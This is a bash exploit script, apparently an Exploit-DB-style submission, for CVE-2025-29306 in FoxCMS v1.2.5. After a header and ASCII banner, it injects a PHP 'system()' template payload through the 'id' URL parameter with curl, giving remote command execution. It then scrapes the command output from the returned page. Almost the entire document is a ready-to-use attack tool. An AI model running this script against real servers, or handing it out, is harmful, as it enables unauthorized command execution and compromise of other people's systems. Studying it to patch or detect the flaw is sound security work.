# Date: 2025-04-17
# Exploit Title:
# Exploit Author: VeryLazyTech
# Vendor Homepage: https://www.foxcms.org/
# Software Link: https://www.foxcms.cn/
# Version: FoxCMS v.1.2.5
# Tested on: Ubuntu 22.04, Windows Server 2019
# CVE: CVE-2025-29306
# Website: https://www.verylazytech.com

#!/bin/bash

banner() {
cat <<'EOF'
  ______     _______   ____   ___ ____  ____    ____   ___ _____  ___   __
 / ___\ \   / / ____| |___ \ / _ \___ \| ___|  |___ \ / _ \___ / / _ \ / /_
| |    \ \ / /|  _|     __) | | | |__) |___ \    __) | (_) ||_ \| | | | '_ \
| |___  \ V / | |___   / __/| |_| / __/ ___) |  / __/ \__, |__) | |_| | (_) |
 \____|  \_/  |_____| |_____|\___/_____|____/  |_____|  /_/____/ \___/ \___/

__     __                _                      _____         _
\ \   / /__ _ __ _   _  | |    __ _ _____   _  |_   _|__  ___| |__
 \ \ / / _ \ '__| | | | | |   / _` |_  / | | |   | |/ _ \/ __| '_ \
  \ V /  __/ |  | |_| | | |__| (_| |/ /| |_| |   | |  __/ (__| | | |
   \_/ \___|_|   \__, | |_____\__,_/___|\__, |   |_|\___|\___|_| |_|
                 |___/                  |___/


                    @VeryLazyTech - Medium

EOF

}

# Call the banner function
banner

set -e

# Check for correct number of arguments
if [ "$#" -ne 2 ]; then
    printf "Usage: $0 <url> <command>"
    exit 1
fi

TARGET=$1

# Encode payload
ENCODED_CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('\${@print_r(@system(\"$2\"))}'))")
FULL_URL="${TARGET}?id=${ENCODED_CMD}"

echo "[*] Sending RCE payload: $2"
HTML=$(curl -s "$FULL_URL")

# Extract <ul> from known XPath location using xmllint
UL_CONTENT=$(echo "$HTML" | xmllint --html --xpath "/html/body/header/div[1]/div[2]/div[1]/ul" - 2>/dev/null)

# Strip tags, clean up
CLEANED=$(echo "$UL_CONTENT" | sed 's/<[^>]*>//g' | sed '/^$/d' | sed 's/^[[:space:]]*//')

echo
echo "[+] Command Output:"
echo "$CLEANED"